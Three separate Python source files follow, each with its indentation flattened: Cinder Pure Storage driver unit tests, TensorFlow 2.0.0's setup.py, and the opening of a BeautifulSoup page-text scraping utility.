def test_create_cgsnapshot(self, mock_snap_list):
mock_cgsnap = mock.Mock()
mock_cgsnap.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
mock_cgsnap.consistencygroup_id = \
"4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
mock_context = mock.Mock()
mock_snap = mock.MagicMock()
expected_snaps = [mock_snap]
mock_snap_list.return_value = expected_snaps
model_update, snapshots = \
self.driver.create_cgsnapshot(mock_context, mock_cgsnap)
cg_id = mock_cgsnap.consistencygroup_id
expected_pgroup_name = self.driver._get_pgroup_name_from_id(cg_id)
expected_snap_suffix = self.driver._get_pgroup_snap_suffix(mock_cgsnap)
self.array.create_pgroup_snapshot\
.assert_called_with(expected_pgroup_name,
suffix=expected_snap_suffix)
self.assertEqual({'status': 'available'}, model_update)
self.assertEqual(expected_snaps, snapshots)
self.assertEqual('available', mock_snap.status)
self.assert_error_propagates(
[self.array.create_pgroup_snapshot],
self.driver.create_cgsnapshot, mock_context, mock_cgsnap)
@mock.patch(BASE_DRIVER_OBJ + "._get_pgroup_snap_name",
spec=pure.PureBaseVolumeDriver._get_pgroup_snap_name)
@mock.patch('cinder.objects.snapshot.SnapshotList.get_all_for_cgsnapshot')
def test_delete_cgsnapshot(self, mock_snap_list, mock_get_snap_name):
snap_name = "consisgroup-4a2f7e3a-312a-40c5-96a8-536b8a0f" \
"e074-cinder.4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
mock_get_snap_name.return_value = snap_name
mock_cgsnap = mock.Mock()
mock_cgsnap.status = 'deleted'
mock_context = mock.Mock()
mock_snap = mock.Mock()
expected_snaps = [mock_snap]
mock_snap_list.return_value = expected_snaps
model_update, snapshots = \
self.driver.delete_cgsnapshot(mock_context, mock_cgsnap)
self.array.destroy_pgroup.assert_called_with(snap_name)
self.assertEqual({'status': mock_cgsnap.status}, model_update)
self.assertEqual(expected_snaps, snapshots)
self.assertEqual('deleted', mock_snap.status)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Protection group snapshot has been destroyed."
)
self.driver.delete_cgsnapshot(mock_context, mock_cgsnap)
self.array.destroy_pgroup.assert_called_with(snap_name)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Protection group snapshot does not exist"
)
self.driver.delete_cgsnapshot(mock_context, mock_cgsnap)
self.array.destroy_pgroup.assert_called_with(snap_name)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Some other error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.delete_cgsnapshot,
mock_context,
mock_cgsnap)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=500,
text="Another different error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.delete_cgsnapshot,
mock_context,
mock_cgsnap)
self.array.destroy_pgroup.side_effect = None
self.assert_error_propagates(
[self.array.destroy_pgroup],
self.driver.delete_cgsnapshot, mock_context, mock_cgsnap)
def test_manage_existing(self):
ref_name = 'vol1'
volume_ref = {'name': ref_name}
self.array.list_volume_private_connections.return_value = []
vol_name = VOLUME['name'] + '-cinder'
self.driver.manage_existing(VOLUME, volume_ref)
self.array.list_volume_private_connections.assert_called_with(ref_name)
self.array.rename_volume.assert_called_with(ref_name, vol_name)
def test_manage_existing_error_propagates(self):
self.array.list_volume_private_connections.return_value = []
self.assert_error_propagates(
[self.array.list_volume_private_connections,
self.array.rename_volume],
self.driver.manage_existing,
VOLUME, {'name': 'vol1'}
)
def test_manage_existing_bad_ref(self):
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'bad_key': 'bad_value'})
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'name': ''})
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'name': None})
self.array.get_volume.side_effect = \
self.purestorage_module.PureHTTPError(
text="Volume does not exist.",
code=400
)
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'name': 'non-existing-volume'})
def test_manage_existing_with_connected_hosts(self):
ref_name = 'vol1'
self.array.list_volume_private_connections.return_value = \
["host1", "host2"]
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'name': ref_name})
self.array.list_volume_private_connections.assert_called_with(ref_name)
self.assertFalse(self.array.rename_volume.called)
def test_manage_existing_get_size(self):
ref_name = 'vol1'
volume_ref = {'name': ref_name}
expected_size = 5
self.array.get_volume.return_value = {"size": 5368709120}
size = self.driver.manage_existing_get_size(VOLUME, volume_ref)
self.assertEqual(expected_size, size)
self.array.get_volume.assert_called_with(ref_name)
def test_manage_existing_get_size_error_propagates(self):
self.array.get_volume.return_value = mock.MagicMock()
self.assert_error_propagates([self.array.get_volume],
self.driver.manage_existing_get_size,
VOLUME, {'name': 'vol1'})
def test_manage_existing_get_size_bad_ref(self):
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing_get_size,
VOLUME, {'bad_key': 'bad_value'})
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing_get_size,
VOLUME, {'name': ''})
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing_get_size,
VOLUME, {'name': None})
def test_unmanage(self):
vol_name = VOLUME['name'] + "-cinder"
unmanaged_vol_name = vol_name + "-unmanaged"
self.driver.unmanage(VOLUME)
self.array.rename_volume.assert_called_with(vol_name,
unmanaged_vol_name)
def test_unmanage_error_propagates(self):
self.assert_error_propagates([self.array.rename_volume],
self.driver.unmanage,
VOLUME)
def test_unmanage_with_deleted_volume(self):
vol_name = VOLUME['name'] + "-cinder"
unmanaged_vol_name = vol_name + "-unmanaged"
self.array.rename_volume.side_effect = \
self.purestorage_module.PureHTTPError(
text="Volume does not exist.",
code=400
)
self.driver.unmanage(VOLUME)
self.array.rename_volume.assert_called_with(vol_name,
unmanaged_vol_name)
def test_retype(self):
# Ensure that we return true no matter what the inputs are
retyped, update = self.driver.retype(None, None, None, None, None)
self.assertTrue(retyped)
self.assertIsNone(update)
class PureISCSIDriverTestCase(PureDriverTestCase):
def setUp(self):
super(PureISCSIDriverTestCase, self).setUp()
self.mock_config.use_chap_auth = False
self.driver = pure.PureISCSIDriver(configuration=self.mock_config)
self.driver._array = self.array
def test_do_setup(self):
self.purestorage_module.FlashArray.return_value = self.array
self.array.get_rest_version.return_value = \
self.driver.SUPPORTED_REST_API_VERSIONS[0]
self.driver.do_setup(None)
self.purestorage_module.FlashArray.assert_called_with(
TARGET,
api_token=API_TOKEN
)
self.assertEqual(self.array, self.driver._array)
self.assertEqual(
self.driver.SUPPORTED_REST_API_VERSIONS,
self.purestorage_module.FlashArray.supported_rest_versions
)
def test_get_host(self):
good_host = PURE_HOST.copy()
good_host.update(iqn=["another-wrong-iqn", INITIATOR_IQN])
bad_host = {"name": "bad-host", "iqn": ["wrong-iqn"]}
self.array.list_hosts.return_value = [bad_host]
real_result = self.driver._get_host(ISCSI_CONNECTOR)
self.assertIs(None, real_result)
self.array.list_hosts.return_value.append(good_host)
real_result = self.driver._get_host(ISCSI_CONNECTOR)
self.assertEqual(good_host, real_result)
self.assert_error_propagates([self.array.list_hosts],
self.driver._get_host, ISCSI_CONNECTOR)
@mock.patch(ISCSI_DRIVER_OBJ + "._connect")
@mock.patch(ISCSI_DRIVER_OBJ + "._get_target_iscsi_ports")
def test_initialize_connection(self, mock_get_iscsi_ports,
mock_connection):
mock_get_iscsi_ports.return_value = ISCSI_PORTS
lun = 1
connection = {
"vol": VOLUME["name"] + "-cinder",
"lun": lun,
}
mock_connection.return_value = connection
result = deepcopy(ISCSI_CONNECTION_INFO)
real_result = self.driver.initialize_connection(VOLUME,
ISCSI_CONNECTOR)
self.assertDictMatch(result, real_result)
mock_get_iscsi_ports.assert_called_with()
mock_connection.assert_called_with(VOLUME, ISCSI_CONNECTOR, None)
self.assert_error_propagates([mock_get_iscsi_ports, mock_connection],
self.driver.initialize_connection,
VOLUME, ISCSI_CONNECTOR)
@mock.patch(ISCSI_DRIVER_OBJ + "._connect")
@mock.patch(ISCSI_DRIVER_OBJ + "._get_target_iscsi_ports")
def test_initialize_connection_with_auth(self, mock_get_iscsi_ports,
mock_connection):
auth_type = "CHAP"
chap_username = ISCSI_CONNECTOR["host"]
chap_password = "password"
mock_get_iscsi_ports.return_value = ISCSI_PORTS
initiator_update = [{"key": pure.CHAP_SECRET_KEY,
"value": chap_password}]
mock_connection.return_value = {
"vol": VOLUME["name"] + "-cinder",
"lun": 1,
"auth_username": chap_username,
"auth_password": chap_password,
}
result = deepcopy(ISCSI_CONNECTION_INFO)
result["data"]["auth_method"] = auth_type
result["data"]["auth_username"] = chap_username
result["data"]["auth_password"] = chap_password
self.mock_config.use_chap_auth = True
# Branch where no credentials were generated
real_result = self.driver.initialize_connection(VOLUME,
ISCSI_CONNECTOR)
mock_connection.assert_called_with(VOLUME, ISCSI_CONNECTOR, None)
self.assertDictMatch(result, real_result)
# Branch where new credentials were generated
mock_connection.return_value["initiator_update"] = initiator_update
result["initiator_update"] = initiator_update
real_result = self.driver.initialize_connection(VOLUME,
ISCSI_CONNECTOR)
mock_connection.assert_called_with(VOLUME, ISCSI_CONNECTOR, None)
self.assertDictMatch(result, real_result)
self.assert_error_propagates([mock_get_iscsi_ports, mock_connection],
self.driver.initialize_connection,
VOLUME, ISCSI_CONNECTOR)
@mock.patch(ISCSI_DRIVER_OBJ + "._connect")
@mock.patch(ISCSI_DRIVER_OBJ + "._get_target_iscsi_ports")
def test_initialize_connection_multipath(self,
mock_get_iscsi_ports,
mock_connection):
mock_get_iscsi_ports.return_value = ISCSI_PORTS
lun = 1
connection = {
"vol": VOLUME["name"] + "-cinder",
"lun": lun,
}
mock_connection.return_value = connection
multipath_connector = deepcopy(ISCSI_CONNECTOR)
multipath_connector["multipath"] = True
result = deepcopy(ISCSI_CONNECTION_INFO)
real_result = self.driver.initialize_connection(VOLUME,
multipath_connector)
self.assertDictMatch(result, real_result)
mock_get_iscsi_ports.assert_called_with()
mock_connection.assert_called_with(VOLUME, multipath_connector, None)
multipath_connector["multipath"] = False
self.driver.initialize_connection(VOLUME, multipath_connector)
def test_get_target_iscsi_ports(self):
self.array.list_ports.return_value = ISCSI_PORTS
ret = self.driver._get_target_iscsi_ports()
self.assertEqual(ISCSI_PORTS, ret)
def test_get_target_iscsi_ports_with_iscsi_and_fc(self):
self.array.list_ports.return_value = PORTS_WITH
ret = self.driver._get_target_iscsi_ports()
self.assertEqual(ISCSI_PORTS, ret)
def test_get_target_iscsi_ports_with_no_ports(self):
# Should raise an exception if there are no ports
self.array.list_ports.return_value = []
self.assertRaises(exception.PureDriverException,
self.driver._get_target_iscsi_ports)
def test_get_target_iscsi_ports_with_only_fc_ports(self):
# Should raise an exception of there are no iscsi ports
self.array.list_ports.return_value = PORTS_WITHOUT
self.assertRaises(exception.PureDriverException,
self.driver._get_target_iscsi_ports)
@mock.patch("cinder.volume.utils.generate_password", autospec=True)
@mock.patch(ISCSI_DRIVER_OBJ + "._get_host", autospec=True)
@mock.patch(ISCSI_DRIVER_OBJ + "._generate_purity_host_name", spec=True)
def test_connect(self, mock_generate, mock_host, mock_gen_secret):
vol_name = VOLUME["name"] + "-cinder"
result = {"vol": vol_name, "lun": 1}
# Branch where host already exists
mock_host.return_value = PURE_HOST
self.array.connect_host.return_value = {"vol": vol_name, "lun": 1}
real_result = self.driver._connect(VOLUME, ISCSI_CONNECTOR, None)
self.assertEqual(result, real_result)
mock_host.assert_called_with(self.driver, ISCSI_CONNECTOR)
self.assertFalse(mock_generate.called)
self.assertFalse(self.array.create_host.called)
self.array.connect_host.assert_called_with(PURE_HOST_NAME, vol_name)
# Branch where new host is created
mock_host.return_value = None
mock_generate.return_value = PURE_HOST_NAME
real_result = self.driver._connect(VOLUME, ISCSI_CONNECTOR, None)
mock_host.assert_called_with(self.driver, ISCSI_CONNECTOR)
mock_generate.assert_called_with(HOSTNAME)
self.array.create_host.assert_called_with(PURE_HOST_NAME,
iqnlist=[INITIATOR_IQN])
self.assertEqual(result, real_result)
mock_generate.reset_mock()
self.array.reset_mock()
self.assert_error_propagates(
[mock_host, mock_generate, self.array.connect_host,
self.array.create_host],
self.driver._connect, VOLUME, ISCSI_CONNECTOR, None)
self.mock_config.use_chap_auth = True
chap_user = ISCSI_CONNECTOR["host"]
chap_password = "sOmEseCr3t"
# Branch where chap is used and credentials already exist
initiator_data = [{"key": pure.CHAP_SECRET_KEY,
"value": chap_password}]
self.driver._connect(VOLUME, ISCSI_CONNECTOR, initiator_data)
result["auth_username"] = chap_user
result["auth_password"] = chap_password
self.assertDictMatch(result, real_result)
self.array.set_host.assert_called_with(PURE_HOST_NAME,
host_user=chap_user,
host_password=chap_password)
# Branch where chap is used and credentials are generated
mock_gen_secret.return_value = chap_password
self.driver._connect(VOLUME, ISCSI_CONNECTOR, None)
result["auth_username"] = chap_user
result["auth_password"] = chap_password
result["initiator_update"] = {
"set_values": {
pure.CHAP_SECRET_KEY: chap_password
},
}
self.assertDictMatch(result, real_result)
self.array.set_host.assert_called_with(PURE_HOST_NAME,
host_user=chap_user,
host_password=chap_password)
@mock.patch(ISCSI_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected(self, mock_host):
mock_host.return_value = PURE_HOST
expected = {"host": PURE_HOST_NAME, "lun": 1}
self.array.list_volume_private_connections.return_value = \
[expected, {"host": "extra", "lun": 2}]
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
actual = self.driver._connect(VOLUME, ISCSI_CONNECTOR, None)
self.assertEqual(expected, actual)
self.assertTrue(self.array.connect_host.called)
self.assertTrue(self.array.list_volume_private_connections)
@mock.patch(ISCSI_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected_list_hosts_empty(self, mock_host):
mock_host.return_value = PURE_HOST
self.array.list_volume_private_connections.return_value = {}
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
self.assertRaises(exception.PureDriverException, self.driver._connect,
VOLUME, ISCSI_CONNECTOR, None)
self.assertTrue(self.array.connect_host.called)
self.assertTrue(self.array.list_volume_private_connections)
@mock.patch(ISCSI_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected_list_hosts_exception(self, mock_host):
mock_host.return_value = PURE_HOST
self.array.list_volume_private_connections.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="")
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver._connect, VOLUME, ISCSI_CONNECTOR, None)
self.assertTrue(self.array.connect_host.called)
self.assertTrue(self.array.list_volume_private_connections)
class PureFCDriverTestCase(PureDriverTestCase):
def setUp(self):
super(PureFCDriverTestCase, self).setUp()
self.driver = pure.PureFCDriver(configuration=self.mock_config)
self.driver._array = self.array
self.driver._lookup_service = mock.Mock()
def test_do_setup(self):
self.purestorage_module.FlashArray.return_value = self.array
self.array.get_rest_version.return_value = \
self.driver.SUPPORTED_REST_API_VERSIONS[0]
self.driver.do_setup(None)
self.purestorage_module.FlashArray.assert_called_with(
TARGET,
api_token=API_TOKEN
)
self.assertEqual(self.array, self.driver._array)
self.assertEqual(
self.driver.SUPPORTED_REST_API_VERSIONS,
self.purestorage_module.FlashArray.supported_rest_versions
)
def test_get_host(self):
good_host = PURE_HOST.copy()
good_host.update(wwn=["another-wrong-wwn", INITIATOR_WWN])
bad_host = {"name": "bad-host", "wwn": ["wrong-wwn"]}
self.array.list_hosts.return_value = [bad_host]
actual_result = self.driver._get_host(FC_CONNECTOR)
self.assertIs(None, actual_result)
self.array.list_hosts.return_value.append(good_host)
actual_result = self.driver._get_host(FC_CONNECTOR)
self.assertEqual(good_host, actual_result)
self.assert_error_propagates([self.array.list_hosts],
self.driver._get_host, FC_CONNECTOR)
@mock.patch(FC_DRIVER_OBJ + "._connect")
def test_initialize_connection(self, mock_connection):
lookup_service = self.driver._lookup_service
(lookup_service.get_device_mapping_from_network.
return_value) = DEVICE_MAPPING
mock_connection.return_value = {"vol": VOLUME["name"] + "-cinder",
"lun": 1,
}
self.array.list_ports.return_value = FC_PORTS
actual_result = self.driver.initialize_connection(VOLUME, FC_CONNECTOR)
self.assertDictMatch(FC_CONNECTION_INFO, actual_result)
@mock.patch(FC_DRIVER_OBJ + "._get_host", autospec=True)
@mock.patch(FC_DRIVER_OBJ + "._generate_purity_host_name", spec=True)
def test_connect(self, mock_generate, mock_host):
vol_name = VOLUME["name"] + "-cinder"
result = {"vol": vol_name, "lun": 1}
# Branch where host already exists
mock_host.return_value = PURE_HOST
self.array.connect_host.return_value = {"vol": vol_name, "lun": 1}
real_result = self.driver._connect(VOLUME, FC_CONNECTOR)
self.assertEqual(result, real_result)
mock_host.assert_called_with(self.driver, FC_CONNECTOR)
self.assertFalse(mock_generate.called)
self.assertFalse(self.array.create_host.called)
self.array.connect_host.assert_called_with(PURE_HOST_NAME, vol_name)
# Branch where new host is created
mock_host.return_value = None
mock_generate.return_value = PURE_HOST_NAME
real_result = self.driver._connect(VOLUME, FC_CONNECTOR)
mock_host.assert_called_with(self.driver, FC_CONNECTOR)
mock_generate.assert_called_with(HOSTNAME)
self.array.create_host.assert_called_with(PURE_HOST_NAME,
wwnlist={INITIATOR_WWN})
self.assertEqual(result, real_result)
mock_generate.reset_mock()
self.array.reset_mock()
self.assert_error_propagates(
[mock_host, mock_generate, self.array.connect_host,
self.array.create_host],
self.driver._connect, VOLUME, FC_CONNECTOR)
@mock.patch(FC_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected(self, mock_host):
mock_host.return_value = PURE_HOST
expected = {"host": PURE_HOST_NAME, "lun": 1}
self.array.list_volume_private_connections.return_value = \
[expected, {"host": "extra", "lun": 2}]
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
actual = self.driver._connect(VOLUME, FC_CONNECTOR)
self.assertEqual(expected, actual)
self.assertTrue(self.array.connect_host.called)
self.assertTrue(self.array.list_volume_private_connections)
@mock.patch(FC_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected_list_hosts_empty(self, mock_host):
mock_host.return_value = PURE_HOST
self.array.list_volume_private_connections.return_value = {}
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
self.assertRaises(exception.PureDriverException, self.driver._connect,
VOLUME, FC_CONNECTOR)
self.assertTrue(self.array.connect_host.called)
self.assertTrue(self.array.list_volume_private_connections)
@mock.patch(FC_DRIVER_OBJ + "._get_host", autospec=True)
def test_connect_already_connected_list_hosts_exception(self, mock_host):
mock_host.return_value = PURE_HOST
self.array.list_volume_private_connections.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="")
self.array.connect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Connection already exists"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver._connect, VOLUME, FC_CONNECTOR)
self.assertTrue(self.array.connect_host.called)
self.assertTrue(self.array.list_volume_private_connections)
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow is an open source machine learning framework for everyone.
TensorFlow is an open source software library for high performance numerical
computation. Its flexible architecture allows easy deployment of computation
across a variety of platforms (CPUs, GPUs, TPUs), and from desktops to clusters
of servers to mobile and edge devices.
Originally developed by researchers and engineers from the Google Brain team
within Google's AI organization, it comes with strong support for machine
learning and deep learning and the flexible numerical computation core is used
across many other scientific domains.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fnmatch
import os
import re
import sys
from setuptools import Command
from setuptools import find_packages
from setuptools import setup
from setuptools.command.install import install as InstallCommandBase
from setuptools.dist import Distribution
DOCLINES = __doc__.split('\n')
# This version string is semver compatible, but incompatible with pip.
# For pip, we will remove all '-' characters from this string, and use the
# result for pip.
# Also update tensorflow/tensorflow.bzl and
# tensorflow/core/public/version.h
_VERSION = '2.0.0'
REQUIRED_PACKAGES = [
'absl-py >= 0.7.0',
'astor >= 0.6.0',
'backports.weakref >= 1.0rc1;python_version<"3.4"',
'enum34 >= 1.1.6;python_version<"3.4"',
'gast == 0.2.2',
'google_pasta >= 0.1.8',
'keras_applications >= 1.0.8',
'keras_preprocessing >= 1.1.0',
'numpy >= 1.16.0, < 2.0',
'opt_einsum >= 2.3.2',
'protobuf >= 3.8.0',
'tensorboard >= 2.0.0, < 2.1.0',
'tensorflow_estimator >= 2.0.0, < 2.1.0',
'termcolor >= 1.1.0',
'wrapt >= 1.11.1',
# python3 requires wheel 0.26
'wheel >= 0.26;python_version>="3"',
'wheel;python_version<"3"',
# mock comes with unittest.mock for python3, need to install for python2
'mock >= 2.0.0;python_version<"3"',
# functools comes with python3, need to install the backport for python2
'functools32 >= 3.2.3;python_version<"3"',
'six >= 1.12.0',
]
if sys.byteorder == 'little':
# grpcio does not build correctly on big-endian machines due to lack of
# BoringSSL support.
# See https://github.com/tensorflow/tensorflow/issues/17882.
REQUIRED_PACKAGES.append('grpcio >= 1.8.6')
project_name = 'tensorflow'
if '--project_name' in sys.argv:
project_name_idx = sys.argv.index('--project_name')
project_name = sys.argv[project_name_idx + 1]
sys.argv.remove('--project_name')
sys.argv.pop(project_name_idx)
# tf-nightly should depend on tb-nightly
if 'tf_nightly' in project_name:
for i, pkg in enumerate(REQUIRED_PACKAGES):
if 'tensorboard' in pkg:
REQUIRED_PACKAGES[i] = 'tb-nightly >= 2.1.0a0, < 2.2.0a0'
elif 'tensorflow_estimator' in pkg and '2.0' in project_name:
REQUIRED_PACKAGES[i] = 'tensorflow-estimator-2.0-preview'
elif 'tensorflow_estimator' in pkg:
REQUIRED_PACKAGES[i] = 'tf-estimator-nightly'
# pylint: disable=line-too-long
CONSOLE_SCRIPTS = [
'toco_from_protos = tensorflow.lite.toco.python.toco_from_protos:main',
'tflite_convert = tensorflow.lite.python.tflite_convert:main',
'toco = tensorflow.lite.python.tflite_convert:main',
'saved_model_cli = tensorflow.python.tools.saved_model_cli:main',
# We need to keep the TensorBoard command, even though the console script
# is now declared by the tensorboard pip package. If we remove the
# TensorBoard command, pip will inappropriately remove it during install,
# even though the command is not removed, just moved to a different wheel.
'tensorboard = tensorboard.main:run_main',
'tf_upgrade_v2 = tensorflow.tools.compatibility.tf_upgrade_v2_main:main',
'estimator_ckpt_converter = tensorflow_estimator.python.estimator.tools.checkpoint_converter:main',
]
# pylint: enable=line-too-long
# Only keep freeze_graph console script in 1.X.
if _VERSION.startswith('1.') and '_2.0' not in project_name:
CONSOLE_SCRIPTS.append(
'freeze_graph = tensorflow.python.tools.freeze_graph:run_main')
# remove the tensorboard console script if building tf_nightly
if 'tf_nightly' in project_name:
CONSOLE_SCRIPTS.remove('tensorboard = tensorboard.main:run_main')
TEST_PACKAGES = [
'scipy >= 0.15.1',
]
class BinaryDistribution(Distribution):
def has_ext_modules(self):
return True
class InstallCommand(InstallCommandBase):
"""Override the dir where the headers go."""
def finalize_options(self):
ret = InstallCommandBase.finalize_options(self)
self.install_headers = os.path.join(self.install_purelib, 'tensorflow_core',
'include')
self.install_lib = self.install_platlib
return ret
class InstallHeaders(Command):
"""Override how headers are copied.
The install_headers that comes with setuptools copies all files to
the same directory. But we need the files to be in a specific directory
hierarchy for -I <include_dir> to work correctly.
"""
description = 'install C/C++ header files'
user_options = [('install-dir=', 'd',
'directory to install header files to'),
('force', 'f',
'force installation (overwrite existing files)'),
]
boolean_options = ['force']
def initialize_options(self):
self.install_dir = None
self.force = 0
self.outfiles = []
def finalize_options(self):
self.set_undefined_options('install',
('install_headers', 'install_dir'),
('force', 'force'))
def mkdir_and_copy_file(self, header):
install_dir = os.path.join(self.install_dir, os.path.dirname(header))
# Get rid of some extra intervening directories so we can have fewer
# directories for -I
install_dir = re.sub('/google/protobuf_archive/src', '', install_dir)
install_dir = re.sub('/include/tensorflow_core/', '/include/tensorflow/',
install_dir)
# Copy external code headers into tensorflow_core/include.
# A symlink would do, but the wheel file that gets created ignores
# symlink within the directory hierarchy.
# NOTE(keveman): Figure out how to customize bdist_wheel package so
# we can do the symlink.
external_header_locations = [
'tensorflow_core/include/external/eigen_archive/',
'tensorflow_core/include/external/com_google_absl/',
]
for location in external_header_locations:
if location in install_dir:
extra_dir = install_dir.replace(location, '')
if not os.path.exists(extra_dir):
self.mkpath(extra_dir)
self.copy_file(header, extra_dir)
if not os.path.exists(install_dir):
self.mkpath(install_dir)
return self.copy_file(header, install_dir)
def run(self):
hdrs = self.distribution.headers
if not hdrs:
return
self.mkpath(self.install_dir)
for header in hdrs:
(out, _) = self.mkdir_and_copy_file(header)
self.outfiles.append(out)
def get_inputs(self):
return self.distribution.headers or []
def get_outputs(self):
return self.outfiles
def find_files(pattern, root):
"""Return all the files matching pattern below root dir."""
for dirpath, _, files in os.walk(root):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(dirpath, filename)
so_lib_paths = [
i for i in os.listdir('.')
if os.path.isdir(i) and fnmatch.fnmatch(i, '_solib_*')
]
matches = []
for path in so_lib_paths:
matches.extend(
['../' + x for x in find_files('*', path) if '.py' not in x]
)
if os.name == 'nt':
EXTENSION_NAME = 'python/_pywrap_tensorflow_internal.pyd'
else:
EXTENSION_NAME = 'python/_pywrap_tensorflow_internal.so'
headers = (
list(find_files('*.h', 'tensorflow_core/core')) +
list(find_files('*.h', 'tensorflow_core/stream_executor')) +
list(find_files('*.h', 'google/com_google_protobuf/src')) +
list(find_files('*.inc', 'google/com_google_protobuf/src')) +
list(find_files('*', 'third_party/eigen3')) + list(
find_files('*.h', 'tensorflow_core/include/external/com_google_absl')) +
list(
find_files('*.inc', 'tensorflow_core/include/external/com_google_absl'))
+ list(find_files('*', 'tensorflow_core/include/external/eigen_archive')))
setup(
name=project_name,
version=_VERSION.replace('-', ''),
description=DOCLINES[0],
long_description='\n'.join(DOCLINES[2:]),
url='https://www.tensorflow.org/',
download_url='https://github.com/tensorflow/tensorflow/tags',
author='Google Inc.',
author_email='packages@tensorflow.org',
# Contained modules and scripts.
packages=find_packages(),
entry_points={
'console_scripts': CONSOLE_SCRIPTS,
},
headers=headers,
install_requires=REQUIRED_PACKAGES,
tests_require=REQUIRED_PACKAGES + TEST_PACKAGES,
# Add in any packaged data.
include_package_data=True,
package_data={
'tensorflow': [
EXTENSION_NAME,
] + matches,
},
zip_safe=False,
distclass=BinaryDistribution,
cmdclass={
'install_headers': InstallHeaders,
'install': InstallCommand,
},
# PyPI package information.
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
license='Apache 2.0',
keywords='tensorflow tensor machine learning',
)
|
|
import requests
from bs4 import BeautifulSoup
from bs4.element import Comment
import re
from utils.common.nlp import tokenize_alphanum
from utils.common.datapipeline import DataPipeline
from utils.common.browser import SelfClosingBrowser
from utils.common.db_utils import read_all_results
_pattern = re.compile('[\W_]+')
def split_and_strip(text):
return [_pattern.sub('', t.lower())
for t in text.split()]
def tag_visible(element):
if element.parent.name in ['style', 'script', 'head',
'title', 'meta', '[document]']:
return False
if isinstance(element, Comment):
return False
return True
def len_sentence(x):
try:
return len(tokenize_alphanum(x))
except TypeError as err:
print("Error with", x)
raise err
def get_sentences(url, return_url=False, selenium=False):
html = ''
if selenium:
with SelfClosingBrowser() as driver:
driver.get(url)
html = driver.page_source
else:
r = requests.get(url)
if r.status_code != 200:
print(url, "not found")
return []
html = r.text
soup = BeautifulSoup(html, "lxml")
texts = soup.findAll(text=True)
visible_texts = filter(tag_visible, texts)
if not return_url:
return [t.strip() for t in visible_texts
if len_sentence(t) > 0]
# Otherwise, find corresponding URL
sentences = []
anchors = [a for a in soup.findAll("a")
if tag_visible(a) and
len_sentence(a.text) > 0]
anchor_text = [a.text for a in anchors]
for t in visible_texts:
if len_sentence(t) == 0:
continue
_url = ''
if t in anchor_text:
a = list(filter(lambda a: t == a.text, anchors))[0]
if "href" in a.attrs:
_url = a.attrs["href"]
sentences.append(dict(go_to_url=_url, text=t, found_on_url=url))
return sentences
def clean_text(t, qual_map):
# Remove strings containing numbers
if any(char.isdigit() for char in t):
return None
# Replace bad chars
bad_chars = ["\n", "\r"]
for c in bad_chars:
t = t.replace(c, "")
# Strip space
while " " in t:
t = t.replace(" ", " ")
t = t.lstrip()
t = t.rstrip()
words = t.split()
# Remove long words
if len(words) > 11:
return None
# Standardise qualifications
for w in t.split():
if w in qual_map:
t = t.replace(w, min(qual_map[w], key=len))
# Program is a misleading word, remove it
if "program" in t.lower():
return None
# Require the standardised string to contain one of these
